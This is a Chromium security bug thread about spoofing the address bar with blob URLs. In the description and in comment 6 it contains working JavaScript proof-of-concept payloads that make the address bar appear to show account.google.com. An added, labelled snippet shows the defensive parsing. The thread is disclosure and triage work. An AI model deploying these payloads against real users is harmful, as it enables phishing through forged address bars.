
Issue 605216

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 594215
Owner: ----
Closed: Apr 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Bug-Security




Address bar spoofing via blob URL

Reported by masa....@gmail.com, Apr 20 2016

Issue description

UserAgent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36

Steps to reproduce the problem:
The POC works in Chrome for Windows, Chrome for Android and Chrome for OS X :)

1. Visit POC.html (http://output.jsbin.com/wayojo):
<script>
  function poc() {
    // Open a blank popup; 2 s later it writes into the opener's document,
    // refocuses the opener and closes itself.
    w = window.open('about:blank', '_blank');
    w.eval('setTimeout("opener.document.write(/pkav~/);opener.focus();window.close();",2000)');
    // Meanwhile, 1 s later, navigate this page to a blob URL whose inner URL
    // carries "%23.account.google.com" after the real host.
    setTimeout("location='blob:"+location.protocol+"//"+location.host+"%23.account.google.com/';",1000)
  }
</script>
<button onclick="poc()">Boom!</button>

2. Click button 'Boom!'.
3. Wait 1 s and look at the address bar.

What is the expected behavior?
Address Bar display:
blob:http://yourdomain%23.account.google.com/

I think using a short domain name like 'account.***' would have a better effect.

What went wrong?
The right display should be:
blob:http://yourdomain/#.account.google.com/

Maybe :)

Did this work before? No 

Chrome version: 49.0.2623.112  Channel: stable
OS Version: 10
Flash Version: Shockwave Flash 21.0 r0

 
Attachments: win.png (25.5 KB), android.jpg (56.0 KB)

Comment 1 Deleted

Comment 2 by masa....@gmail.com, Apr 20 2016

Chrome for iOS is ok.
Attachment: ios-chrome.PNG (32.8 KB)

Comment 3 by masa....@gmail.com, Apr 20 2016

Or address should display "about:blank".

Comment 4 by vakh@chromium.org, Apr 20 2016

Cc: palmer@chromium.org
palmer@ -- this is reproducible but can you please comment on whether this needs to be addressed or is WAI? Thanks.

Comment 5 by palmer@chromium.org, Apr 21 2016

Cc: pkasting@chromium.org f...@chromium.org emilyschechter@chromium.org
Components: UI>Browser>Omnibox Security>UX
Labels: Security_Severity-Low Security_Impact-Stable
Status: Available (was: Unconfirmed)
We should fix this.

Comment 6 by masa....@gmail.com, Apr 21 2016

No-user-interaction POC:
https://output.jsbin.com/rufowucuwi/

<script>
// HTML payload that, once loaded, immediately rewrites the displayed URL via
// history.replaceState to a blob URL carrying "%23.google.com" after the real host.
var exp = 'pkavpkavpkav<script>history.replaceState("","","blob:'+location.protocol+'//'+location.host+'%23.google.com//")<\/script>';
// Navigate this page to a same-origin blob URL serving that payload; no click needed.
location = URL.createObjectURL(new Blob([exp], {type: "text/html"}))
</script>

I think it's MODERATE.
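Added example, not code from the reporter or the Chromium project: the URL shape used by the two POCs above (the button POC in the description and the history.replaceState POC in comment 6), run through a WHATWG-compliant URL parser (Node's URL class) to show why the displayed string misleads. The host a reader infers from the text ends in account.google.com, while the inner URL's host contains an encoded '#' (%23), which a compliant parser rejects, so the blob URL has no real origin at all. The safeDisplay policy, which falls back to about:blank as comment 3 suggests, is an assumption for illustration and not Chrome's actual fix; the names SPOOF, LEGIT, apparentHost, blobInnerOrigin and safeDisplay, and the UUID in LEGIT, are made up.

```javascript
// Added example, not code from the bug report: what a WHATWG-compliant URL
// parser (Node's URL class here) makes of the reporter's spoofing URL, next to
// what a user reading the raw string would take the host to be.

// Constructed inputs. "yourdomain" stands in for the attacker's host, as in
// the report; the UUID in the legitimate blob URL is made up.
const SPOOF = "blob:http://yourdomain%23.account.google.com/";
const LEGIT = "blob:http://yourdomain/3f2504e0-4f89-11d3-9a0c-0305e82c3301";

// The host a reader infers from the displayed text: whatever sits between the
// last "://" and the next "/", "?" or "#". This models the reader's perception
// that the spoof exploits, not anything a parser does.
function apparentHost(displayed) {
  const i = displayed.lastIndexOf("://");
  if (i < 0) return null;
  const rest = displayed.slice(i + 3);
  const end = rest.search(/[/?#]/);
  return end < 0 ? rest : rest.slice(0, end);
}

// The origin a spec-compliant browser assigns to a blob: URL: parse the inner
// URL carried in the blob URL's path and take its origin. "%23" decodes to "#",
// a forbidden host code point, so the inner URL of SPOOF fails to parse and the
// blob URL gets no real origin (returned here as null).
function blobInnerOrigin(blobUrl) {
  let outer;
  try { outer = new URL(blobUrl); } catch { return null; }
  if (outer.protocol !== "blob:") return null;
  try {
    const inner = new URL(outer.pathname);
    return inner.origin === "null" ? null : inner.origin;
  } catch {
    return null;
  }
}

// Display policy modelled on comment 3's suggestion (an assumption, not Chrome's
// actual fix): render from the parsed origin and fall back to "about:blank"
// when the blob URL has none, so attacker-chosen text never reaches the bar.
function safeDisplay(blobUrl) {
  const origin = blobInnerOrigin(blobUrl);
  return origin === null ? "about:blank" : `blob:${origin}/`;
}

for (const u of [SPOOF, LEGIT]) {
  console.log(`${u}\n  apparent host : ${apparentHost(u)}\n  parsed origin : ${blobInnerOrigin(u)}\n  safe display  : ${safeDisplay(u)}`);
}
```

Run it with `node`: for SPOOF the apparent host is "yourdomain%23.account.google.com" while the parsed origin is null, so the two disagree and the safe display shows about:blank; for LEGIT both agree on http://yourdomain. The point is that any display derived from the raw string, rather than from the parsed origin, can be steered by the attacker.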

Comment 7 by vakh@chromium.org, Apr 21 2016

Issue 605400 has been merged into this issue.

Comment 8 by masa....@gmail.com, Apr 21 2016

@vakh I think Issue 605400 should be a MODERATE vuln.

Comment 9 by mea...@chromium.org, Apr 21 2016

We have a bug 594215 open to track this issue.

Comment 10 Deleted

Comment 11 by vakh@chromium.org, Apr 22 2016

Mergedinto: 594215
Status: Duplicate (was: Available)

Comment 12 by masa....@gmail.com, May 20 2016

Is there any progress?
I have a plan for bug 594215, will send it out soon. But before that I want to finish bug 606619.

Comment 14 by masa....@gmail.com, May 20 2016

So, will I get a bug bounty?
Labels: allpublic
Components: -Security>UX
Labels: Team-Security-UX
Security>UX component is deprecated in favor of the Team-Security-UX label

Comment 17 by sheriffbot@chromium.org, Apr 22 2017

Labels: -Restrict-View-SecurityTeam
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
